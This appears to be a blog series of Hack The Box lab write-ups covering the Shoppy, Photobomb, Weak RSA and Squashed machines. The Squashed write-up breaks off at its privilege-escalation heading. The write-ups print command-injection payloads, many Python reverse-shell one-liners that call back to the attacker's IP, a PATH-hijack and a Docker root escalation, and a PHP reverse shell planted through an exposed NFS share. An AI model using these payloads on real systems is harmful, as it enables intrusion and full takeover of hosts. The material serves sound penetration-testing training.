Shoppy Foothold

Our initial scans showed that SSH was open. Attempting to SSH to the machine with the newly discovered credentials does give us access. Furthermore, it looks like we have the ability to run a password-manager command as the user deploys with sudo.

┌─[[email protected]]─[/media/sf_OneDrive/Hack The Box/Machines/Shoppy]
└──╼ $ssh [email protected]
The authenticity of host '10.129.227.233 (10.129.227.233)' can't be established.
ECDSA key fingerprint is SHA256:KoI81LeAk+ps7zoc1ru39Mg7srdxjzOb1UgmdW6T6kI.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.129.227.233' (ECDSA) to the list of known hosts.
[email protected]'s password: 
Linux shoppy 5.10.0-18-amd64 #1 SMP Debian 5.10.140-1 (2022-09-02) x86_64

The programs included with the Debian GNU/Linux system are free software;
the exact distribution terms for each program are described in the
individual files in /usr/share/doc/*/copyright.

Debian GNU/Linux comes with ABSOLUTELY NO WARRANTY, to the extent
permitted by applicable law.
manpath: can't set the locale; make sure $LC_* and $LANG are correct
[email protected]:~$ id
uid=1000(jaeger) gid=1000(jaeger) groups=1000(jaeger)
[email protected]:~$ sudo -l
[sudo] password for jaeger: 
Matching Defaults entries for jaeger on shoppy:
    env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin

User jaeger may run the following commands on shoppy:
    (deploy) /home/deploy/password-manager

I was also able to grab the user flag.

[email protected]:~$ cat /home/jaeger/user.txt 
2b5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓320

I executed the password manager binary and it asked me for a password. Next, I tried the same password that I used to SSH to the machine but it was incorrect.

[email protected]:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: [email protected]!
Access denied! This incident will be reported !

After that, I used strings on the binary to see whether I could find the password that way. Initially, strings reported back a lot of information. Not all of it was useful but I could see that it was using cat to read the contents of a creds.txt file. I ran strings again with different encoding and got the word “Sample” back.

[email protected]:~$ strings -e l /home/deploy/password-manager
Sample

Running the password-manager binary again with the correct password gave me some credentials.

[email protected]:~$ sudo -u deploy /home/deploy/password-manager
Welcome to Josh password manager!
Please enter your master password: Sample
Access granted! Here is creds !
Deploy Creds :
username: deploy
password: [email protected]!

I was then able to switch user or SSH to the machine as the deploy user. Unfortunately, the deploy user didn’t have any sudo privileges. However, upon checking the groups that the user belonged to, it became evident that Docker was going to play a part in the privilege escalation process.

$ sudo -l
[sudo] password for deploy: 
Sorry, user deploy may not run sudo on shoppy.
$ id
uid=1001(deploy) gid=1001(deploy) groups=1001(deploy),998(docker)
$ docker images
REPOSITORY   TAG       IMAGE ID       CREATED        SIZE
alpine       latest    d7d3d98c851f   7 months ago   5.53MB

Shoppy Docker Privilege Escalation

Using Docker, I span up a new container where the root of the machine was mounted inside the container. Doing so should give me the permissions needed to access the root flag. Once the container was created I used chroot and was able to grab the root flag.

$ docker run --rm -it -v /:/mnt alpine /bin/sh
/ # cd /mnt
/mnt # chroot .
[email protected]:/# 
[email protected]:/# cat /root/root.txt
3d5▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓269

This was a fun machine. I haven’t done much with the technologies involved like Node.JS and NoSQL databases. I have done privilege escalation with docker containers before but that was a while ago that required me to upload the image myself (from what I remember). Anyway, I learnt a lot from this box which I’m sure I will forget in a week’s time.

Hack The Box Photobomb Writeup

Hello world and welcome to Haxez, this is a write-up for the Hack The Box Photobomb machine. This machine is listed as an easy machine. It requires some web application enumeration to gain access to the admin area. Then, you need to perform remote code execution on a parameter in order to get a shell. Finally, you need to elevate your privileges to root by exploiting a script that calls a binary without an absolute path.

Enumerating Photobomb

First, we perform a Nmap scan targeting the IP of the Photobomb box. I used ‘sT’ for full TCP connect scan, ‘sV’ to get service versions, ‘-p-‘ to scan all ports, ‘–script vulns’ to check for vulnerabilities and ‘–reason’ just to see why Nmap has concluded what it concluded. The results show that port 22 for SSH and port 80 for HTTP are open.

Nmap scan report for 10.129.248.187
Host is up, received echo-reply ttl 63 (0.015s latency).
Not shown: 65533 closed tcp ports (conn-refused)
PORT   STATE SERVICE REASON  VERSION
22/tcp open  ssh     syn-ack OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| vulners: 
|   cpe:/a:openbsd:openssh:8.2p1: 
|     	CVE-2020-15778	6.8	https://vulners.com/cve/CVE-2020-15778
|     	C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	6.8	https://vulners.com/githubexploit/C94132FD-1FA5-5342-B6EE-0DAF45EEFFE3	*EXPLOIT*
|     	10213DBE-F683-58BB-B6D3-353173626207	6.8	https://vulners.com/githubexploit/10213DBE-F683-58BB-B6D3-353173626207	*EXPLOIT*
|     	CVE-2020-12062	5.0	https://vulners.com/cve/CVE-2020-12062
|     	CVE-2021-28041	4.6	https://vulners.com/cve/CVE-2021-28041
|     	CVE-2021-41617	4.4	https://vulners.com/cve/CVE-2021-41617
|     	CVE-2020-14145	4.3	https://vulners.com/cve/CVE-2020-14145
|     	CVE-2016-20012	4.3	https://vulners.com/cve/CVE-2016-20012
|_    	CVE-2021-36368	2.6	https://vulners.com/cve/CVE-2021-36368
80/tcp open  http    syn-ack nginx 1.18.0 (Ubuntu)
|_http-server-header: nginx/1.18.0 (Ubuntu)
|_http-stored-xss: Couldn't find any stored XSS vulnerabilities.
|_http-dombased-xss: Couldn't find any DOM based XSS.
|_http-csrf: Couldn't find any CSRF vulnerabilities.
No exact OS matches for host (If you know what OS is running on it, see https://nmap.org/submit/ ).
TCP/IP fingerprint:
OS:SCAN(V=7.93%E=4%D=3/10%OT=22%CT=1%CU=37113%PV=Y%DS=2%DC=T%G=Y%TM=640AFE0
OS:C%P=x86_64-pc-linux-gnu)SEQ(SP=104%GCD=1%ISR=10E%TI=Z%CI=Z%II=I%TS=A)OPS
OS:(O1=M550ST11NW7%O2=M550ST11NW7%O3=M550NNT11NW7%O4=M550ST11NW7%O5=M550ST1
OS:1NW7%O6=M550ST11)WIN(W1=FE88%W2=FE88%W3=FE88%W4=FE88%W5=FE88%W6=FE88)ECN
OS:(R=Y%DF=Y%T=40%W=FAF0%O=M550NNSNW7%CC=Y%Q=)T1(R=Y%DF=Y%T=40%S=O%A=S+%F=A
OS:S%RD=0%Q=)T2(R=N)T3(R=N)T4(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F=R%O=%RD=0%Q=)T5(R
OS:=Y%DF=Y%T=40%W=0%S=Z%A=S+%F=AR%O=%RD=0%Q=)T6(R=Y%DF=Y%T=40%W=0%S=A%A=Z%F
OS:=R%O=%RD=0%Q=)T7(R=N)U1(R=Y%DF=N%T=40%IPL=164%UN=0%RIPL=G%RID=G%RIPCK=G%
OS:RUCK=G%RUD=G)IE(R=Y%DFI=N%T=40%CD=S)
Network Distance: 2 hops
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
TRACEROUTE (using proto 1/icmp)
HOP RTT      ADDRESS
1   13.40 ms 10.10.14.1
2   13.66 ms 10.129.248.187
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 144.46 seconds

Wandering The Web

Since it is unlikely we need to brute force our way in, we will start with the web application on port 80. Navigating to the IP of the application will give you an error because you don’t have the hostname in your /etc/hosts file. However, this can be resolved easily by running the following command to echo it into your host’s file. Just ensure you replace the IP.

┌─[[email protected]]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo echo "10.129.248.187 photobomb.htb" | sudo tee -a /etc/hosts

Next, I ran gobuster against the domain but didn’t find much. You can see the output of that below but there isn’t really much to show.

┌─[✗]─[[email protected]]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo gobuster dir -u http://photobomb.htb/ -w /usr/share/dirb/wordlists/common.txt
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://photobomb.htb/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /usr/share/dirb/wordlists/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/03/10 10:02:27 Starting gobuster in directory enumeration mode
===============================================================
/favicon.ico          (Status: 200) [Size: 10990]
/printers             (Status: 401) [Size: 188]  
/printer              (Status: 401) [Size: 188]                
===============================================================
2023/03/10 10:02:37 Finished

The landing page of the website had a link which redirected you to an admin page. However, the admin page was protected by HTTP basic authentication. We could brute force this but it’s probably better to look around a bit more first. Inspecting the index page, we see a link to a javascript file. Furthermore, navigating to this javascript file gives us some credentials.

Photobomb Basic Auth
Photobomb Basic Auth

It seems that Jameson got fed up with people forgetting the password. He coded the site to automatically authenticate users provided they have a matching cookie of ‘isPhotoBombTechSupport’.

function init() {
  // Jameson: pre-populate creds for tech support as they keep forgetting them and emailing me
  if (document.cookie.match(/^(.*;)?\s*isPhotoBombTechSupport\s*=\s*[^;]+(.*)?$/)) {  document.getElementsByClassName('creds')[0].setAttribute('href','http://pH0t0:[email protected]/printer');
  }
}
window.onload = init;

Go ahead, grab the URL including the username and password and paste it into your browser. It should automatically authenticate.

Authenticated
Authenticated

Photobomb Foothold

The website has a download link for the various photos. Clicking and intercepting this request with Burp Suite shows that it’s a post request with a number of parameters. We can send the request to the repeater and start playing with it.

So, I ran into a few issues here. When capturing the download request and attempting to play with that I kept getting 401 authorization errors. However, if you forward the first request, you then get another request with the basic auth HTTP header. This is the request where you can start having fun.

I set up a TCPDump on my tun0 interface. Sent the request to the repeater and then attempted to perform remote code execution ping on each parameter. The file type parameter failed to properly sanitise the code and started to ping my machine.

POST /printer HTTP/1.1 
Host: photobomb.htb 
Content-Length: 102 
Cache-Control: max-age=0 
Authorization: Basic cEgwdDA6YjBNYiE= 
Upgrade-Insecure-Requests: 1 
Origin: http://photobomb.htb 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Referer: http://photobomb.htb/printer 
Accept-Encoding: gzip, deflate 
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 
Connection: close 

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;+ping+-c+3+10.10.14.126&dimensions=3000x2000

And the TCPDump started lighting up like a Christmas tree. WE HAVE RCE.

┌─[[email protected]]─[/mnt/hgfs/MOUNT/Photobomb]
└──╼ $sudo tcpdump -ni tun0 icmp
tcpdump: verbose output suppressed, use -v[v]... for full protocol decode
listening on tun0, link-type RAW (Raw IP), snapshot length 262144 bytes
10:36:53.200183 IP 10.129.248.187 > 10.10.14.126: ICMP echo request, id 1, seq 1, length 64
10:36:53.200208 IP 10.10.14.126 > 10.129.248.187: ICMP echo reply, id 1, seq 1, length 64
10:36:54.202314 IP 10.129.248.187 > 10.10.14.126: ICMP echo request, id 1, seq 2, length 64
10:36:54.202344 IP 10.10.14.126 > 10.129.248.187: ICMP echo reply, id 1, seq 2, length 64

Catching Shells

Next, I headed to everyone’s favourite payload provider, payload all the things. I grabbed one of their python payloads. Configured it, set up my listener and… it didn’t work. I tried a few others. The ones below are all the ones that didn’t work. There were more, with modifications but yeah, trial and error I guess.

export RHOST="10.10.14.126";export RPORT=1337;python -c 'import socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

export RHOST="10.10.14.126";export RPORT=1337;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"
))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

python -c 'import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",1337));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python -c 'import socket,subprocess;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));subprocess.call(["/bin/sh","-i"],stdin=s.fileno(),stdout=s.fileno(),stderr=s.fileno())'

export RHOST="10.10.14.126";export RPORT=8888;python3 -c 'import
sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"
))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("sh")'

python -c 'import socket,os,pty;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'socket=__import__("socket");os=__import__("os");pty=__import__("pty");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);pty.spawn("/bin/sh")'

python -c 'socket=__import__("socket");subprocess=__import__("subprocess");os=__import__("os");s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.14.126",4242));os.dup2(s.fileno(),0);os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);subprocess.call(["/bin/sh","-i"])'

python -c 'a=__import__;b=a("socket").socket;c=a("subprocess").call;s=b();s.connect(("10.10.14.126",8888));f=s.fileno;c(["/bin/sh","-i"],stdin=f(),stdout=f(),stderr=f())'

None of those worked. In the end, I went to revshells.com Put in my IP address, and port and selected Python3#1. I asked it to URL encode it. I pasted it into the request and it worked instantly.

Revshells.com
Revshells.com
Burp Reverse Shell
Burp Reverse Shell
POST /printer HTTP/1.1 
Host: photobomb.htb 
Content-Length: 102 
Cache-Control: max-age=0 
Authorization: Basic cEgwdDA6YjBNYiE= 
Upgrade-Insecure-Requests: 1 
Origin: http://photobomb.htb 
Content-Type: application/x-www-form-urlencoded 
User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9 
Referer: http://photobomb.htb/printer 
Accept-Encoding: gzip, deflate 
Accept-Language: en-GB,en-US;q=0.9,en;q=0.8 
Connection: close 

photo=voicu-apostol-MWER49YaD-M-unsplash.jpg&filetype=jpg;export%20RHOST%3D%2210.10.14.126%22%3Bexport%20RPORT%3D8888%3Bpython3%20-c%20%27import%20sys%2Csocket%2Cos%2Cpty%3Bs%3Dsocket.socket%28%29%3Bs.connect%28%28os.getenv%28%22RHOST%22%29%2Cint%28os.getenv%28%22RPORT%22%29%29%29%29%3B%5Bos.dup2%28s.fileno%28%29%2Cfd%29%20for%20fd%20in%20%280%2C1%2C2%29%5D%3Bpty.spawn%28%22sh%22%29%27&dimensions=3000x2000

Side note. I just watched Ippsec’s video and he did this with a simple bash 1 liner. I feel stupid for not trying it.

Authenticated Information Gathering

First things first, let’s make our shell a little bit more usable with the python stty trick.

which python3
/usr/bin/python3
$ python3 -c 'import pty; pty.spawn("/bin/bash")'
python3 -c 'import pty; pty.spawn("/bin/bash")'
[email protected]:~/photobomb$

Then we can grab the user flag because we are a wizard.

[email protected]:~/photobomb$ ls /home
ls /home
wizard
[email protected]:~/photobomb$ ls /home/wizard
ls /home/wizard
photobomb  user.txt

[email protected]:~/photobomb$ cat /home/wizard/user.txt
cat /home/wizard/user.txt
08a▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓1eb

Ace, now time to poke about a bit and see what we can see. Soooo, we are now on the box. Time to gather some more information. The first thing I always tend to do is to run sudo –l to see if we have anything good.

[email protected]:~/photobomb$ sudo -l
sudo -l
Matching Defaults entries for wizard on photobomb:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User wizard may run the following commands on photobomb:
    (root) SETENV: NOPASSWD: /opt/cleanup.sh

It looks like we have a script called cleanup.sh in the opt directory that we can run as root without the password. Furthermore, environmental variables are reset with ‘env_reset’ and we can set our own environmental variables when running this script as indicated by the SETENV thingy. Let’s look at the script.

[email protected]:~/photobomb$ cat /opt/cleanup.sh
cat /opt/cleanup.sh
#!/bin/bash
. /opt/.bashrc
cd /home/wizard/photobomb

# clean up log files
if [ -s log/photobomb.log ] && ! [ -L log/photobomb.log ]
then
  /bin/cat log/photobomb.log > log/photobomb.log.old
  /usr/bin/truncate -s0 log/photobomb.log
fi

# protect the priceless originals
find source_images -type f -name '*.jpg' -exec chown root:root {} \;

Looking back at this, I can see that the obvious exploit to go after is the find binary without the absolute path. Just drop your own find binary containing /bin/bash into /tmp and then execute the script with the PATH argument of /tmp. I didn’t do that though.

Photobomb Privilege Escalation

It is calling bashrc from /opt/.bashrc. From my understanding, bashrc is like a configuration file that bash runs. You have one in your home directory and you can add commands like screenfetch to it so that it displays asci art whenever you launch a terminal. Still, I wasn’t quite sure what to do here.

I took a look at the official walkthrough to find out what to do. The author of the walkthrough ran diff on the /opt/.bashrc and /etc/bash.bashrc files to see what was different. So I will do the same.

[email protected]:~/photobomb$ diff /etc/bash.bashrc /opt/.bashrc
diff /etc/bash.bashrc /opt/.bashrc
5a6,11
> # Jameson: ensure that snaps don't interfere, 'cos they are dumb
> PATH=${PATH/:\/snap\/bin/}
> 
> # Jameson: caused problems with testing whether to rotate the log file
> enable -n [ # ]

I was a bit thrown off by this until I read the write-up. I understand the theory behind this privilege escalation and have done it with different binaries loads of times. The absolute path hasn’t been sent in a script. This means you can create your own binary with the same name and then change your environmental variable to point to that binary. Then, when you execute the script it uses your environmental variables to find the binary which you have pointed to the malicious binary.

The bit I didn’t understand was the square bracket. I didn’t know what I was looking at. It’s enabling something? It looked as though it was enabling comments. Ok… how does that help me. Well, it’s not enabling comments, it enabling the built-in shell command ‘[‘ without an absolute path. So in theory, if we create a malicious file named ‘[‘, place it somewhere like /tmp and then change our environment variable PATH to /tmp.

Then when we launch clenaup.sh, that launches bash which runs bashrc which runs our malicious ‘[‘ file. I think that’s how it is supposed to work anyway. Still learning.

Crafting The Exploit

So we need to create the ‘[‘ file in /tmp, add something to it and then make it executable.

[email protected]:~/photobomb$ touch /tmp/[
touch /tmp/[
[email protected]:~/photobomb$ echo '/bin/bash' > /tmp/[
echo '/bin/bash' > /tmp/[
[email protected]:~/photobomb$ chmod +x /tmp/[
chmod +x /tmp/[

Then we run the /opt/cleanup.sh script while specifying the PATH environmental variable and it should give us root… question mark..

[email protected]:~/photobomb$ sudo PATH=/tmp:$PATH /opt/cleanup.sh
sudo PATH=/tmp:$PATH /opt/cleanup.sh
[email protected]:/home/wizard/photobomb# whoami
whoami
root
[email protected]:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/wizard/photobomb#

Well that worked. We can now grab the root flag and we’re done.

[email protected]:/home/wizard/photobomb# whoami
whoami
root
[email protected]:/home/wizard/photobomb# id
id
uid=0(root) gid=0(root) groups=0(root)
[email protected]:/home/wizard/photobomb# cat /root/root.txt
cat /root/root.txt
618▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓▓5e3
[email protected]:/home/wizard/photobomb#

And we’re done. Fun box.

Hack The Box Weak RSA Writeup

Hello world and welcome to haxez, today I will attempt to solve the Weak RSA crypto challenge on Hack The Box. Please note that I got the solution from https://technicalciso.com/. I’m not even going to pretend to know the specifics behind how this all works. I know what encryption is. Furthermore, I know the various types of encryption including RSA. I also know how public and private key pairs work. However, I don’t know how you would break it. I’ve broken SSH keys before using John The Ripper but that’s about it.

Weak RSA Set Up

This challenge requires you to download some files and decrypt the flag so that it can be submitted to Hack The Box. First, we need to do is download the files and extract them. The password for the zip file is ‘hackthebox’. Next, looking at the files we notice that we have a flag.enc file and a key.pub file. I assume that the flag.enc was encrypted using the key.pub file.

┌─[[email protected]]─[/mnt/hgfs/MOUNT/WeakRSA]
└──╼ $unzip Weak\ RSA.zip 
Archive:  Weak RSA.zip
[Weak RSA.zip] flag.enc password: 
  inflating: flag.enc                
  inflating: key.pub          

┌─[[email protected]]─[/mnt/hgfs/MOUNT/WeakRSA]
└──╼ $ls -laSh
total 30K
drwxrwxrwx 1 root root 12K Mar 10 12:31  ..
-rwxrwxrwx 1 root root 826 Mar 10 12:34 'Weak RSA.zip'
-rwxrwxrwx 1 root root 447 May 15  2017  key.pub
-rwxrwxrwx 1 root root 129 Jul  3  2017  flag.enc
drwxrwxrwx 1 root root   0 Mar 10 12:35  . 

File Explanation

Previously, I mentioned public and private key pairs. This is the same type of cryptographic function when you SSH to a server with a private key. Your public key will be stored on the server and then you specify your private key. Next, the server does the maths and if it’s all good then you can access the server. The same theory can be applied to PGP. Someone encrypts a document to your public key which allows you to decrypt the document with your private key.

So, we have a flag.enc (enc probably means encrypted right?), and we have a key.pub. The key.pub is probably the public key used to encrypt the file. The problem is, RSA is an asymmetric cryptosystem. You can encrypt it with your public key but you can’t decrypt it with your public key. If you could, then it would be symmetric encryption where one key is used for both encrypting and decrypting. So, what do we do?

Cracking The Weak RSA Encryption

Turns out, there is a reason why it is a good idea to use long passwords. When it comes to encryption, size does matter. If something has been encrypted with a short encryption key, it may be possible to break it. Shorter likely means fewer sums to do right? That makes sense logically surely. I could be completely wrong, but this is my understanding of it. If the flag was encrypted using a short RSA private key then we might be able to deduce the private key from the public key and then decrypt the file. However, we need a tool.

git clone https://github.com/RsaCtfTool/RsaCtfTool.git
sudo apt-get install libgmp3-dev libmpc-dev
cd RsaCtfTool
pip3 install -r "requirements.txt"
./RsaCtfTool.py

Once installed, we can then point the tool to our public key and politely ask it to produce the private key.

┌─[[email protected]]─[/opt/RsaCtfTool]
└──╼ $./RsaCtfTool.py --publickey /mnt/hgfs/MOUNT/WeakRSA/key.pub --private
[] Testing key /mnt/hgfs/MOUNT/WeakRSA/key.pub. attack initialized… [] Performing factordb attack on /mnt/hgfs/MOUNT/WeakRSA/key.pub.
[*] Attack success with factordb method !
Results for /mnt/hgfs/MOUNT/WeakRSA/key.pub:
Private key :
-----BEGIN RSA PRIVATE KEY-----
MIICOQIBAAKBgQMwO3kPsUnaNAbUlaubn7ip4pNEXjvUOxjvLwUhtybr6Ng4undL
tSQPCPf7ygoUKh1KYeqXMpTmhKjRos3xioTy23CZuOl3WIsLiRKSVYyqBc9d8rxj
NMXuUIOiNO38ealcR4p44zfHI66INPuKmTG3RQP/6p5hv1PYcWmErEeDewKBgGEX
xgRIsTlFGrW2C2JXoSvakMCWD60eAH0W2PpDqlqqOFD8JA5UFK0roQkOjhLWSVu8
c6DLpWJQQlXHPqP702qIg/gx2o0bm4EzrCEJ4gYo6Ax+U7q6TOWhQpiBHnC0ojE8
kUoqMhfALpUaruTJ6zmj8IA1e1M6bMqVF8srlb/NAiBhwngxi+Cbie3YBogNzGJV
h10vAgw+i7cQqiiwEiPFNQJBAYXzr5r2KkHVjGcZNCLRAoXrzJjVhb7knZE5oEYo
nEI+h2gQSt1bavv3YVxhcisTVuNrlgQo58eGb4c9dtY2blMCQQIX2W9IbtJ26KzZ
C/5HPsVqgxWtuP5hN8OLf3ohhojr1NigJwc6o68dtKScaEQ5A33vmNpuWqKucecT
0HEVxuE5AiBhwngxi+Cbie3YBogNzGJVh10vAgw+i7cQqiiwEiPFNQIgYcJ4MYvg
m4nt2AaIDcxiVYddLwIMPou3EKoosBIjxTUCQQCnqbJMPEQHpg5lI6MQi8ixFRqo
+KwoBrwYfZlGEwZxdK2Ms0jgeta5jFFS11Fwk5+GyimnRzVcEbADJno/8BKe
-----END RSA PRIVATE KEY-----

Score.

Decrypting The File

Now we can use the private key to decrypt the flag and submit the flag to hack the box and win the challenge. Apparently, there is a way to do this with RsaCtfTool but I couldn’t work it out. It wouldn’t output the flag or create a new file. So I will use OpenSSL to decrypt the flag using the private key that RsaCtfTool just magically found for us.

┌─[[email protected]]─[/mnt/hgfs/MOUNT/WeakRSA]
└──╼ $openssl rsautl -in flag.enc -out flag.txt -decrypt -inkey priv.key
┌─[[email protected]]─[/mnt/hgfs/MOUNT/WeakRSA]
└──╼ $ls
flag.enc flag.txt key.pub priv.key RsaCtfTool.py 'Weak RSA.zip'
┌─[[email protected]]─[/mnt/hgfs/MOUNT/WeakRSA]
└──╼ $cat flag.txt
HTB{sxxxx_Wxxxxrs_xxxxck}

And there you have it, submit the flag and you are done.

Hack The Box Squashed Writeup

Hello world and welcome to haxez and my write-up for the Squashed machine. I’ve been getting back into doing Hack The Box machines again. I’ve started studying for the CPTS and the CBBH and thought I would do some boxes to complement the academy courses.

Information Gathering

Once I started the box I started enumerating it with Nmap. I targeted all ports, ran safe checks, and asked for version information. From the scan, results came back showing that ports 22, 80, 111, and 2049 were open. This suggested that the box was a web server with a publically exposed NFS service.

Starting Nmap 7.93 ( https://nmap.org ) at 2023-03-09 09:55 GMT
Nmap scan report for 10.129.228.109
Host is up (0.022s latency).
Not shown: 65527 closed tcp ports (reset)
PORT      STATE SERVICE  VERSION
22/tcp    open  ssh      OpenSSH 8.2p1 Ubuntu 4ubuntu0.5 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   3072 48add5b83a9fbcbef7e8201ef6bfdeae (RSA)
|   256 b7896c0b20ed49b2c1867c2992741c1f (ECDSA)
|_  256 18cd9d08a621a8b8b6f79f8d405154fb (ED25519)
80/tcp    open  http     Apache httpd 2.4.41 ((Ubuntu))
|_http-title: Built Better
|_http-server-header: Apache/2.4.41 (Ubuntu)
111/tcp   open  rpcbind  2-4 (RPC #100000)
| rpcinfo: 
|   program version    port/proto  service
|   100000  2,3,4        111/tcp   rpcbind
|   100000  2,3,4        111/udp   rpcbind
|   100000  3,4          111/tcp6  rpcbind
|   100000  3,4          111/udp6  rpcbind
|   100003  3           2049/udp   nfs
|   100003  3           2049/udp6  nfs
|   100003  3,4         2049/tcp   nfs
|   100003  3,4         2049/tcp6  nfs
|   100005  1,2,3      38714/udp6  mountd
|   100005  1,2,3      40865/tcp6  mountd
|   100005  1,2,3      48822/udp   mountd
|   100005  1,2,3      59769/tcp   mountd
|   100021  1,3,4      38567/tcp6  nlockmgr
|   100021  1,3,4      40531/tcp   nlockmgr
|   100021  1,3,4      46286/udp   nlockmgr
|   100021  1,3,4      53135/udp6  nlockmgr
|   100227  3           2049/tcp   nfs_acl
|   100227  3           2049/tcp6  nfs_acl
|   100227  3           2049/udp   nfs_acl
|_  100227  3           2049/udp6  nfs_acl
2049/tcp  open  nfs_acl  3 (RPC #100227)
40531/tcp open  nlockmgr 1-4 (RPC #100021)
41359/tcp open  mountd   1-3 (RPC #100005)
43719/tcp open  mountd   1-3 (RPC #100005)
59769/tcp open  mountd   1-3 (RPC #100005)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 19.66 seconds
Port 80 and nfs are open.
Nmap Squashed
Nmap Squashed

Network File System Enumeration

Rather than brute forcing SSH or checking out the website on port 80, I decided to check out the Network File System service. To do this, I used the showmount command and pointed it to the IP address of the machine. The results from Showmount suggested that there were 2 exports. One for a user called ross and one for the webserver.

┌─[[email protected]]─[~]
└──╼ $sudo showmount -e 10.129.228.109
Export list for 10.129.228.109:
/home/ross    *
/var/www/html *
NFS Showmount
NFS Showmount

Squashed Foothold

In order to get a foothold on Squashed, I mounted the /var/www/html NFS export. Then, I listed the parent directory and got the user ID 2017.

┌─[[email protected]]─[~]
└──╼ $sudo mount -t nfs 10.129.228.109:/var/www/html /mnt/www
┌─[[email protected]]─[~]
└──╼ $ls -laSH /mnt
total 13
dr-xr-xr-x  1 root root     4192 Mar  9 09:35 hgfs
drwxr-xr-x 14 1001 scanner  4096 Mar  9 09:19 ross
drwxr-xr--  5 2017 www-data 4096 Mar  9 09:35 www
drwxr-xr-x  1 root root      262 Mar  8 09:31 ..
drwxr-xr-x  1 root root       22 Mar  9 09:35 .

I created my own user with that user ID and switched to it. I moved into the html directory and used wget to download a PHP reverse shell from the pentestmonkey GitHub page.

$ wget https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
--2023-03-09 09:39:25--  https://raw.githubusercontent.com/pentestmonkey/php-reverse-shell/master/php-reverse-shell.php
Resolving raw.githubusercontent.com (raw.githubusercontent.com)... 
Connecting to raw.githubusercontent.com (raw.githubusercontent.com)|185.199.108.133|:443... connected.
HTTP request sent, awaiting response... 200 OK
Length: 5491 (5.4K) [text/plain]
Saving to: ‘php-reverse-shell.php’
php-reverse-shell.php                           100%[============================================>]   5.36K  --.-KB/s    in 0s      
2023-03-09 09:39:25 (57.3 MB/s) - ‘php-reverse-shell.php’ saved [5491/5491]

After changing the IP in the reverse shell, I set up a netcat listener and used curl to trigger the shell.

┌─[[email protected]]─[~]
└──╼ $sudo curl http://10.129.228.109/php-reverse-shell.php

This allowed me to get a shell on Squashed as the user alex. I upgraded my shell using the python stty trick and was able to capture the user flag.

Squashed User Flag
Squashed User Flag

Squashed Privilege Escalation

